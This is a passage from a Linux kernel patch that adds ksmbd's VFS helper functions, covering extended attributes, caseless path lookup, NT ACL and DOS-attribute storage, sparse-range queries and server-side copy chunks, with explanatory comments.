++			err = check_lock_range(filp, size,
++					       inode->i_size - 1, WRITE);
++		} else {
++			err = check_lock_range(filp, inode->i_size,
++					       size - 1, WRITE);
++		}
++
++		if (err) {
++			pr_err("failed due to lock\n");
++			return -EAGAIN;
++		}
++	}
++
++	err = vfs_truncate(&filp->f_path, size);
++	if (err)
++		pr_err("truncate failed, err %d\n", err);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_listxattr() - vfs helper for smb list extended attributes
++ * @dentry:	dentry of file for listing xattrs
++ * @list:	on success, set to an allocated xattr name list that the
++ *		caller must kvfree()
++ *
++ * Return:	xattr list length on success, otherwise error
++ */
++ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list)
++{
++	ssize_t size;
++	char *vlist = NULL;
++
++	size = vfs_listxattr(dentry, NULL, 0);
++	if (size <= 0)
++		return size;
++
++	vlist = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++	if (!vlist)
++		return -ENOMEM;
++
++	*list = vlist;
++	size = vfs_listxattr(dentry, vlist, size);
++	if (size < 0) {
++		ksmbd_debug(VFS, "listxattr failed\n");
++		kvfree(vlist);
++		*list = NULL;
++	}
++
++	return size;
++}
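++
++/*
++ * The double call to vfs_listxattr() above is the usual two-pass
++ * pattern: a NULL buffer first to learn the required size, then a
++ * second call to fill the freshly allocated buffer. The result is a
++ * run of NUL-terminated names (e.g. "user.foo\0security.NTACL\0")
++ * that callers walk with strlen(name) + 1 strides.
++ */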
++
++static ssize_t ksmbd_vfs_xattr_len(struct user_namespace *user_ns,
++				   struct dentry *dentry, char *xattr_name)
++{
++	return vfs_getxattr(user_ns, dentry, xattr_name, NULL, 0);
++}
++
++/**
++ * ksmbd_vfs_getxattr() - vfs helper for smb get extended attributes value
++ * @user_ns:	user namespace
++ * @dentry:	dentry of file for getting xattrs
++ * @xattr_name:	name of xattr name to query
++ * @xattr_buf:	destination buffer xattr value
++ *
++ * Return:	read xattr value length on success, otherwise error
++ */
++ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   char *xattr_name, char **xattr_buf)
++{
++	ssize_t xattr_len;
++	char *buf;
++
++	*xattr_buf = NULL;
++	xattr_len = ksmbd_vfs_xattr_len(user_ns, dentry, xattr_name);
++	if (xattr_len < 0)
++		return xattr_len;
++
++	buf = kmalloc(xattr_len + 1, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	xattr_len = vfs_getxattr(user_ns, dentry, xattr_name,
++				 (void *)buf, xattr_len);
++	if (xattr_len > 0)
++		*xattr_buf = buf;
++	else
++		kfree(buf);
++	return xattr_len;
++}
++
++/**
++ * ksmbd_vfs_setxattr() - vfs helper for smb set extended attributes value
++ * @user_ns:	user namespace
++ * @dentry:	dentry to set XATTR at
++ * @attr_name:	xattr name to set
++ * @attr_value:	xattr value to set
++ * @attr_size:	size of xattr value
++ * @flags:	setxattr flags, e.g. XATTR_CREATE or XATTR_REPLACE
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
++		       struct dentry *dentry, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags)
++{
++	int err;
++
++	err = vfs_setxattr(user_ns,
++			   dentry,
++			   attr_name,
++			   attr_value,
++			   attr_size,
++			   flags);
++	if (err)
++		ksmbd_debug(VFS, "setxattr failed, err %d\n", err);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_set_fadvise() - convert smb IO caching options to linux options
++ * @filp:	file pointer for IO
++ * @option:	smb IO options
++ */
++void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option)
++{
++	struct address_space *mapping;
++
++	mapping = filp->f_mapping;
++
++	if (!option || !mapping)
++		return;
++
++	if (option & FILE_WRITE_THROUGH_LE) {
++		filp->f_flags |= O_SYNC;
++	} else if (option & FILE_SEQUENTIAL_ONLY_LE) {
++		filp->f_ra.ra_pages = inode_to_bdi(mapping->host)->ra_pages * 2;
++		spin_lock(&filp->f_lock);
++		filp->f_mode &= ~FMODE_RANDOM;
++		spin_unlock(&filp->f_lock);
++	} else if (option & FILE_RANDOM_ACCESS_LE) {
++		spin_lock(&filp->f_lock);
++		filp->f_mode |= FMODE_RANDOM;
++		spin_unlock(&filp->f_lock);
++	}
++}
++
++int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
++			loff_t off, loff_t len)
++{
++	smb_break_all_levII_oplock(work, fp, 1);
++	if (fp->f_ci->m_fattr & FILE_ATTRIBUTE_SPARSE_FILE_LE)
++		return vfs_fallocate(fp->filp,
++				     FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
++				     off, len);
++
++	return vfs_fallocate(fp->filp,
++			     FALLOC_FL_ZERO_RANGE | FALLOC_FL_KEEP_SIZE,
++			     off, len);
++}
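++
++/*
++ * Design note for the branch above: on a sparse file a zero request
++ * may deallocate blocks (FALLOC_FL_PUNCH_HOLE), while a non-sparse
++ * file must keep its blocks allocated and gets them zeroed in place
++ * (FALLOC_FL_ZERO_RANGE); FALLOC_FL_KEEP_SIZE leaves i_size
++ * unchanged in both cases.
++ */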
++
++int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
++			 struct file_allocated_range_buffer *ranges,
++			 unsigned int in_count, unsigned int *out_count)
++{
++	struct file *f = fp->filp;
++	struct inode *inode = file_inode(fp->filp);
++	loff_t maxbytes = (u64)inode->i_sb->s_maxbytes, end;
++	loff_t extent_start, extent_end;
++	int ret = 0;
++
++	if (start > maxbytes)
++		return -EFBIG;
++
++	if (!in_count)
++		return 0;
++
++	/*
++	 * Shrink request scope to what the fs can actually handle.
++	 */
++	if (length > maxbytes || (maxbytes - length) < start)
++		length = maxbytes - start;
++
++	if (start + length > inode->i_size)
++		length = inode->i_size - start;
++
++	*out_count = 0;
++	end = start + length;
++	while (start < end && *out_count < in_count) {
++		extent_start = vfs_llseek(f, start, SEEK_DATA);
++		if (extent_start < 0) {
++			if (extent_start != -ENXIO)
++				ret = (int)extent_start;
++			break;
++		}
++
++		if (extent_start >= end)
++			break;
++
++		extent_end = vfs_llseek(f, extent_start, SEEK_HOLE);
++		if (extent_end < 0) {
++			if (extent_end != -ENXIO)
++				ret = (int)extent_end;
++			break;
++		} else if (extent_start >= extent_end) {
++			break;
++		}
++
++		ranges[*out_count].file_offset = cpu_to_le64(extent_start);
++		ranges[(*out_count)++].length =
++			cpu_to_le64(min(extent_end, end) - extent_start);
++
++		start = extent_end;
++	}
++
++	return ret;
++}
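++
++/*
++ * Worked example for the loop above, on a hypothetical sparse file
++ * with data at 0-4K and 1M-1M+4K (i_size = 1M+4K): a query with
++ * start=0 and length=2M is first clamped to i_size, after which
++ * SEEK_DATA/SEEK_HOLE yield the ranges (0, 4K) and (1M, 4K); start
++ * then reaches end and the loop exits with *out_count == 2.
++ */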
++
++int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
++			   struct dentry *dentry, char *attr_name)
++{
++	return vfs_removexattr(user_ns, dentry, attr_name);
++}
++
++int ksmbd_vfs_unlink(struct user_namespace *user_ns,
++		     struct dentry *dir, struct dentry *dentry)
++{
++	int err = 0;
++
++	err = ksmbd_vfs_lock_parent(user_ns, dir, dentry);
++	if (err)
++		return err;
++	dget(dentry);
++
++	if (S_ISDIR(d_inode(dentry)->i_mode))
++		err = vfs_rmdir(user_ns, d_inode(dir), dentry);
++	else
++		err = vfs_unlink(user_ns, d_inode(dir), dentry, NULL);
++
++	dput(dentry);
++	inode_unlock(d_inode(dir));
++	if (err)
++		ksmbd_debug(VFS, "failed to delete, err %d\n", err);
++
++	return err;
++}
++
++static bool __dir_empty(struct dir_context *ctx, const char *name, int namlen,
++		       loff_t offset, u64 ino, unsigned int d_type)
++{
++	struct ksmbd_readdir_data *buf;
++
++	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
++	buf->dirent_count++;
++
++	return buf->dirent_count <= 2;
++}
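++
++/*
++ * The "<= 2" above relies on every directory containing at least the
++ * "." and ".." entries; a third callback means the directory is not
++ * empty, and returning false stops iterate_dir() early.
++ */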
++
++/**
++ * ksmbd_vfs_empty_dir() - check for empty directory
++ * @fp:	ksmbd file pointer
++ *
++ * Return:	0 if the directory is empty, otherwise -ENOTEMPTY
++ */
++int ksmbd_vfs_empty_dir(struct ksmbd_file *fp)
++{
++	int err;
++	struct ksmbd_readdir_data readdir_data;
++
++	memset(&readdir_data, 0, sizeof(struct ksmbd_readdir_data));
++
++	set_ctx_actor(&readdir_data.ctx, __dir_empty);
++	readdir_data.dirent_count = 0;
++
++	err = iterate_dir(fp->filp, &readdir_data.ctx);
++	if (readdir_data.dirent_count > 2)
++		err = -ENOTEMPTY;
++	else
++		err = 0;
++	return err;
++}
++
++static bool __caseless_lookup(struct dir_context *ctx, const char *name,
++			     int namlen, loff_t offset, u64 ino,
++			     unsigned int d_type)
++{
++	struct ksmbd_readdir_data *buf;
++	int cmp = -EINVAL;
++
++	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
++
++	if (buf->used != namlen)
++		return true;
++	if (IS_ENABLED(CONFIG_UNICODE) && buf->um) {
++		const struct qstr q_buf = {.name = buf->private,
++					   .len = buf->used};
++		const struct qstr q_name = {.name = name,
++					    .len = namlen};
++
++		cmp = utf8_strncasecmp(buf->um, &q_buf, &q_name);
++	}
++	if (cmp < 0)
++		cmp = strncasecmp((char *)buf->private, name, namlen);
++	if (!cmp) {
++		memcpy((char *)buf->private, name, namlen);
++		buf->dirent_count = 1;
++		return false;
++	}
++	return true;
++}
++
++/**
++ * ksmbd_vfs_lookup_in_dir() - lookup a file in a directory
++ * @dir:	path of the directory to search
++ * @name:	filename to lookup; updated with the on-disk spelling on
++ *		a caseless match
++ * @namelen:	filename length
++ * @um:	unicode map used for caseless comparison
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int ksmbd_vfs_lookup_in_dir(const struct path *dir, char *name,
++				   size_t namelen, struct unicode_map *um)
++{
++	int ret;
++	struct file *dfilp;
++	int flags = O_RDONLY | O_LARGEFILE;
++	struct ksmbd_readdir_data readdir_data = {
++		.ctx.actor	= __caseless_lookup,
++		.private	= name,
++		.used		= namelen,
++		.dirent_count	= 0,
++		.um		= um,
++	};
++
++	dfilp = dentry_open(dir, flags, current_cred());
++	if (IS_ERR(dfilp))
++		return PTR_ERR(dfilp);
++
++	ret = iterate_dir(dfilp, &readdir_data.ctx);
++	if (readdir_data.dirent_count > 0)
++		ret = 0;
++	fput(dfilp);
++	return ret;
++}
++
++/**
++ * ksmbd_vfs_kern_path() - lookup a file and get path info
++ * @work:	smb work
++ * @name:	file path that is relative to share
++ * @flags:	lookup flags
++ * @path:	if the lookup succeeds, receives the path info
++ * @caseless:	caseless filename lookup
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
++			unsigned int flags, struct path *path, bool caseless)
++{
++	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
++	int err;
++
++	flags |= LOOKUP_BENEATH;
++	err = vfs_path_lookup(share_conf->vfs_path.dentry,
++			      share_conf->vfs_path.mnt,
++			      name,
++			      flags,
++			      path);
++	if (!err)
++		return 0;
++
++	if (caseless) {
++		char *filepath;
++		struct path parent;
++		size_t path_len, remain_len;
++
++		filepath = kstrdup(name, GFP_KERNEL);
++		if (!filepath)
++			return -ENOMEM;
++
++		path_len = strlen(filepath);
++		remain_len = path_len;
++
++		parent = share_conf->vfs_path;
++		path_get(&parent);
++
++		while (d_can_lookup(parent.dentry)) {
++			char *filename = filepath + path_len - remain_len;
++			char *next = strchrnul(filename, '/');
++			size_t filename_len = next - filename;
++			bool is_last = !next[0];
++
++			if (filename_len == 0)
++				break;
++
++			err = ksmbd_vfs_lookup_in_dir(&parent, filename,
++						      filename_len,
++						      work->conn->um);
++			path_put(&parent);
++			if (err)
++				goto out;
++
++			next[0] = '\0';
++
++			err = vfs_path_lookup(share_conf->vfs_path.dentry,
++					      share_conf->vfs_path.mnt,
++					      filepath,
++					      flags,
++					      &parent);
++			if (err)
++				goto out;
++			else if (is_last) {
++				*path = parent;
++				goto out;
++			}
++
++			next[0] = '/';
++			remain_len -= filename_len + 1;
++		}
++
++		path_put(&parent);
++		err = -EINVAL;
++out:
++		kfree(filepath);
++	}
++	return err;
++}
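++
++/*
++ * Caseless fallback, sketched with hypothetical paths: for a share
++ * containing "Docs/Readme.TXT", a lookup of "docs/readme.txt" first
++ * fails the exact vfs_path_lookup(); the loop above then fixes one
++ * component at a time ("docs" -> "Docs", then "readme.txt" ->
++ * "Readme.TXT"), since ksmbd_vfs_lookup_in_dir() rewrites a matched
++ * name in place, and re-runs the lookup on the corrected prefix.
++ */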
++
++struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
++					  const char *name,
++					  unsigned int flags,
++					  struct path *path)
++{
++	char *abs_name;
++	struct dentry *dent;
++
++	abs_name = convert_to_unix_name(work->tcon->share_conf, name);
++	if (!abs_name)
++		return ERR_PTR(-ENOMEM);
++
++	dent = kern_path_create(AT_FDCWD, abs_name, path, flags);
++	kfree(abs_name);
++	return dent;
++}
++
++int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
++				struct dentry *dentry)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t xattr_list_len;
++	int err = 0;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++	     name += strlen(name) + 1) {
++		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
++
++		if (!strncmp(name, XATTR_NAME_POSIX_ACL_ACCESS,
++			     sizeof(XATTR_NAME_POSIX_ACL_ACCESS) - 1) ||
++		    !strncmp(name, XATTR_NAME_POSIX_ACL_DEFAULT,
++			     sizeof(XATTR_NAME_POSIX_ACL_DEFAULT) - 1)) {
++			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			if (err)
++				ksmbd_debug(SMB,
++					    "remove acl xattr failed : %s\n", name);
++		}
++	}
++out:
++	kvfree(xattr_list);
++	return err;
++}
++
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
++			       struct dentry *dentry)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t xattr_list_len;
++	int err = 0;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
++
++		if (!strncmp(name, XATTR_NAME_SD, XATTR_NAME_SD_LEN)) {
++			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			if (err)
++				ksmbd_debug(SMB, "remove xattr failed : %s\n", name);
++		}
++	}
++out:
++	kvfree(xattr_list);
++	return err;
++}
++
++static struct xattr_smb_acl *ksmbd_vfs_make_xattr_posix_acl(struct user_namespace *user_ns,
++							    struct inode *inode,
++							    int acl_type)
++{
++	struct xattr_smb_acl *smb_acl = NULL;
++	struct posix_acl *posix_acls;
++	struct posix_acl_entry *pa_entry;
++	struct xattr_acl_entry *xa_entry;
++	int i;
++
++	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
++		return NULL;
++
++	posix_acls = get_acl(inode, acl_type);
++	if (!posix_acls)
++		return NULL;
++
++	smb_acl = kzalloc(sizeof(struct xattr_smb_acl) +
++			  sizeof(struct xattr_acl_entry) * posix_acls->a_count,
++			  GFP_KERNEL);
++	if (!smb_acl)
++		goto out;
++
++	smb_acl->count = posix_acls->a_count;
++	pa_entry = posix_acls->a_entries;
++	xa_entry = smb_acl->entries;
++	for (i = 0; i < posix_acls->a_count; i++, pa_entry++, xa_entry++) {
++		switch (pa_entry->e_tag) {
++		case ACL_USER:
++			xa_entry->type = SMB_ACL_USER;
++			xa_entry->uid = posix_acl_uid_translate(user_ns, pa_entry);
++			break;
++		case ACL_USER_OBJ:
++			xa_entry->type = SMB_ACL_USER_OBJ;
++			break;
++		case ACL_GROUP:
++			xa_entry->type = SMB_ACL_GROUP;
++			xa_entry->gid = posix_acl_gid_translate(user_ns, pa_entry);
++			break;
++		case ACL_GROUP_OBJ:
++			xa_entry->type = SMB_ACL_GROUP_OBJ;
++			break;
++		case ACL_OTHER:
++			xa_entry->type = SMB_ACL_OTHER;
++			break;
++		case ACL_MASK:
++			xa_entry->type = SMB_ACL_MASK;
++			break;
++		default:
++			pr_err("unknown type : 0x%x\n", pa_entry->e_tag);
++			goto out;
++		}
++
++		if (pa_entry->e_perm & ACL_READ)
++			xa_entry->perm |= SMB_ACL_READ;
++		if (pa_entry->e_perm & ACL_WRITE)
++			xa_entry->perm |= SMB_ACL_WRITE;
++		if (pa_entry->e_perm & ACL_EXECUTE)
++			xa_entry->perm |= SMB_ACL_EXECUTE;
++	}
++out:
++	posix_acl_release(posix_acls);
++	return smb_acl;
++}
++
++int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd *pntsd, int len)
++{
++	int rc;
++	struct ndr sd_ndr = {0}, acl_ndr = {0};
++	struct xattr_ntacl acl = {0};
++	struct xattr_smb_acl *smb_acl, *def_smb_acl = NULL;
++	struct inode *inode = d_inode(dentry);
++
++	acl.version = 4;
++	acl.hash_type = XATTR_SD_HASH_TYPE_SHA256;
++	acl.current_time = ksmbd_UnixTimeToNT(current_time(inode));
++
++	memcpy(acl.desc, "posix_acl", 9);
++	acl.desc_len = 10;
++
++	pntsd->osidoffset =
++		cpu_to_le32(le32_to_cpu(pntsd->osidoffset) + NDR_NTSD_OFFSETOF);
++	pntsd->gsidoffset =
++		cpu_to_le32(le32_to_cpu(pntsd->gsidoffset) + NDR_NTSD_OFFSETOF);
++	pntsd->dacloffset =
++		cpu_to_le32(le32_to_cpu(pntsd->dacloffset) + NDR_NTSD_OFFSETOF);
++
++	acl.sd_buf = (char *)pntsd;
++	acl.sd_size = len;
++
++	rc = ksmbd_gen_sd_hash(conn, acl.sd_buf, acl.sd_size, acl.hash);
++	if (rc) {
++		pr_err("failed to generate hash for ndr acl\n");
++		return rc;
++	}
++
++	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++						 ACL_TYPE_ACCESS);
++	if (S_ISDIR(inode->i_mode))
++		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++							     ACL_TYPE_DEFAULT);
++
++	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode,
++				  smb_acl, def_smb_acl);
++	if (rc) {
++		pr_err("failed to encode ndr to posix acl\n");
++		goto out;
++	}
++
++	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset,
++			       acl.posix_acl_hash);
++	if (rc) {
++		pr_err("failed to generate hash for ndr acl\n");
++		goto out;
++	}
++
++	rc = ndr_encode_v4_ntacl(&sd_ndr, &acl);
++	if (rc) {
++		pr_err("failed to encode ndr to posix acl\n");
++		goto out;
++	}
++
++	rc = ksmbd_vfs_setxattr(user_ns, dentry,
++				XATTR_NAME_SD, sd_ndr.data,
++				sd_ndr.offset, 0);
++	if (rc < 0)
++		pr_err("Failed to store XATTR ntacl :%d\n", rc);
++
++	kfree(sd_ndr.data);
++out:
++	kfree(acl_ndr.data);
++	kfree(smb_acl);
++	kfree(def_smb_acl);
++	return rc;
++}
++
++int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd **pntsd)
++{
++	int rc;
++	struct ndr n;
++	struct inode *inode = d_inode(dentry);
++	struct ndr acl_ndr = {0};
++	struct xattr_ntacl acl;
++	struct xattr_smb_acl *smb_acl = NULL, *def_smb_acl = NULL;
++	__u8 cmp_hash[XATTR_SD_HASH_SIZE] = {0};
++
++	rc = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_SD, &n.data);
++	if (rc <= 0)
++		return rc;
++
++	n.length = rc;
++	rc = ndr_decode_v4_ntacl(&n, &acl);
++	if (rc)
++		goto free_n_data;
++
++	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++						 ACL_TYPE_ACCESS);
++	if (S_ISDIR(inode->i_mode))
++		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
++							     ACL_TYPE_DEFAULT);
++
++	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode, smb_acl,
++				  def_smb_acl);
++	if (rc) {
++		pr_err("failed to encode ndr to posix acl\n");
++		goto out_free;
++	}
++
++	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset, cmp_hash);
++	if (rc) {
++		pr_err("failed to generate hash for ndr acl\n");
++		goto out_free;
++	}
++
++	if (memcmp(cmp_hash, acl.posix_acl_hash, XATTR_SD_HASH_SIZE)) {
++		pr_err("hash value diff\n");
++		rc = -EINVAL;
++		goto out_free;
++	}
++
++	*pntsd = acl.sd_buf;
++	if (acl.sd_size < sizeof(struct smb_ntsd)) {
++		pr_err("sd size is invalid\n");
++		rc = -EINVAL;
++		goto out_free;
++	}
++
++	(*pntsd)->osidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->osidoffset) -
++					   NDR_NTSD_OFFSETOF);
++	(*pntsd)->gsidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->gsidoffset) -
++					   NDR_NTSD_OFFSETOF);
++	(*pntsd)->dacloffset = cpu_to_le32(le32_to_cpu((*pntsd)->dacloffset) -
++					   NDR_NTSD_OFFSETOF);
++
++	rc = acl.sd_size;
++out_free:
++	kfree(acl_ndr.data);
++	kfree(smb_acl);
++	kfree(def_smb_acl);
++	if (rc < 0) {
++		kfree(acl.sd_buf);
++		*pntsd = NULL;
++	}
++
++free_n_data:
++	kfree(n.data);
++	return rc;
++}
++
++int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da)
++{
++	struct ndr n;
++	int err;
++
++	err = ndr_encode_dos_attr(&n, da);
++	if (err)
++		return err;
++
++	err = ksmbd_vfs_setxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
++				 (void *)n.data, n.offset, 0);
++	if (err)
++		ksmbd_debug(SMB, "failed to store dos attribute in xattr\n");
++	kfree(n.data);
++
++	return err;
++}
++
++int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da)
++{
++	struct ndr n;
++	int err;
++
++	err = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
++				 (char **)&n.data);
++	if (err > 0) {
++		n.length = err;
++		if (ndr_decode_dos_attr(&n, da))
++			err = -EINVAL;
++		kfree(n.data);
++	} else {
++		ksmbd_debug(SMB, "failed to load dos attribute in xattr\n");
++	}
++
++	return err;
++}
++
++/**
++ * ksmbd_vfs_init_kstat() - convert unix stat information to smb stat format
++ * @p:          destination buffer
++ * @ksmbd_kstat:      ksmbd kstat wrapper
++ */
++void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat)
++{
++	struct file_directory_info *info = (struct file_directory_info *)(*p);
++	struct kstat *kstat = ksmbd_kstat->kstat;
++	u64 time;
++
++	info->FileIndex = 0;
++	info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
++	time = ksmbd_UnixTimeToNT(kstat->atime);
++	info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(kstat->mtime);
++	info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(kstat->ctime);
++	info->ChangeTime = cpu_to_le64(time);
++
++	if (ksmbd_kstat->file_attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
++		info->EndOfFile = 0;
++		info->AllocationSize = 0;
++	} else {
++		info->EndOfFile = cpu_to_le64(kstat->size);
++		info->AllocationSize = cpu_to_le64(kstat->blocks << 9);
++	}
++	info->ExtFileAttributes = ksmbd_kstat->file_attributes;
++
++	return info;
++}
++
++int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
++				struct user_namespace *user_ns,
++				struct dentry *dentry,
++				struct ksmbd_kstat *ksmbd_kstat)
++{
++	u64 time;
++	int rc;
++
++	generic_fillattr(user_ns, d_inode(dentry), ksmbd_kstat->kstat);
++
++	time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
++	ksmbd_kstat->create_time = time;
++
++	/*
++	 * Set a default value for the case that 'store dos attributes' is
++	 * not set to yes, or ACLs are disabled in the server's filesystem
++	 * while the config says yes.
++	 */
++	if (S_ISDIR(ksmbd_kstat->kstat->mode))
++		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_DIRECTORY_LE;
++	else
++		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_ARCHIVE_LE;
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
++		struct xattr_dos_attrib da;
++
++		rc = ksmbd_vfs_get_dos_attrib_xattr(user_ns, dentry, &da);
++		if (rc > 0) {
++			ksmbd_kstat->file_attributes = cpu_to_le32(da.attr);
++			ksmbd_kstat->create_time = da.create_time;
++		} else {
++			ksmbd_debug(VFS, "fail to load dos attribute.\n");
++		}
++	}
++
++	return 0;
++}
++
++ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
++				struct dentry *dentry, char *attr_name,
++				int attr_name_len)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t value_len = -ENOENT, xattr_list_len;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len <= 0)
++		goto out;
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
++		if (strncasecmp(attr_name, name, attr_name_len))
++			continue;
++
++		value_len = ksmbd_vfs_xattr_len(user_ns, dentry, name);
++		break;
++	}
++
++out:
++	kvfree(xattr_list);
++	return value_len;
++}
++
++int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
++				size_t *xattr_stream_name_size, int s_type)
++{
++	char *type, *buf;
++
++	if (s_type == DIR_STREAM)
++		type = ":$INDEX_ALLOCATION";
++	else
++		type = ":$DATA";
++
++	buf = kasprintf(GFP_KERNEL, "%s%s%s",
++			XATTR_NAME_STREAM, stream_name,	type);
++	if (!buf)
++		return -ENOMEM;
++
++	*xattr_stream_name = buf;
++	*xattr_stream_name_size = strlen(buf) + 1;
++
++	return 0;
++}
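++
++/*
++ * Example output (assuming XATTR_NAME_STREAM expands to
++ * "user.DosStream."): stream_name "bar" with s_type DATA_STREAM
++ * yields "user.DosStream.bar:$DATA", while a DIR_STREAM yields
++ * "user.DosStream.bar:$INDEX_ALLOCATION".
++ */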
++
++int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
++			       struct ksmbd_file *src_fp,
++			       struct ksmbd_file *dst_fp,
++			       struct srv_copychunk *chunks,
++			       unsigned int chunk_count,
++			       unsigned int *chunk_count_written,
++			       unsigned int *chunk_size_written,
++			       loff_t *total_size_written)
++{
++	unsigned int i;
++	loff_t src_off, dst_off, src_file_size;
++	size_t len;
++	int ret;
++
++	*chunk_count_written = 0;
++	*chunk_size_written = 0;
++	*total_size_written = 0;
++
++	if (!(src_fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
++		pr_err("no right to read(%pD)\n", src_fp->filp);
++		return -EACCES;
++	}
++	if (!(dst_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE))) {
++		pr_err("no right to write(%pD)\n", dst_fp->filp);
++		return -EACCES;
++	}
++
++	if (ksmbd_stream_fd(src_fp) || ksmbd_stream_fd(dst_fp))
++		return -EBADF;
++
++	smb_break_all_levII_oplock(work, dst_fp, 1);
++
++	if (!work->tcon->posix_extensions) {
++		for (i = 0; i < chunk_count; i++) {
++			src_off = le64_to_cpu(chunks[i].SourceOffset);
++			dst_off = le64_to_cpu(chunks[i].TargetOffset);
++			len = le32_to_cpu(chunks[i].Length);
++
++			if (check_lock_range(src_fp->filp, src_off,
++					     src_off + len - 1, READ))
++				return -EAGAIN;
++			if (check_lock_range(dst_fp->filp, dst_off,
++					     dst_off + len - 1, WRITE))
++				return -EAGAIN;
++		}
++	}
++
++	src_file_size = i_size_read(file_inode(src_fp->filp));
++
++	for (i = 0; i < chunk_count; i++) {
++		src_off = le64_to_cpu(chunks[i].SourceOffset);
++		dst_off = le64_to_cpu(chunks[i].TargetOffset);
++		len = le32_to_cpu(chunks[i].Length);
++
++		if (src_off + len > src_file_size)
++			return -E2BIG;
++
++		ret = vfs_copy_file_range(src_fp->filp, src_off,
++					  dst_fp->filp, dst_off, len, 0);
++		if (ret == -EOPNOTSUPP || ret == -EXDEV)
++			ret = vfs_copy_file_range(src_fp->filp, src_off,
++						  dst_fp->filp, dst_off, len,
++						  COPY_FILE_SPLICE);
++		if (ret < 0)
++			return ret;
++
++		*chunk_count_written += 1;
++		*total_size_written += ret;
++	}
++	return 0;
++}
++
++void ksmbd_vfs_posix_lock_wait(struct file_lock *flock)
++{
++	wait_event(flock->fl_wait, !flock->fl_blocker);
++}
++
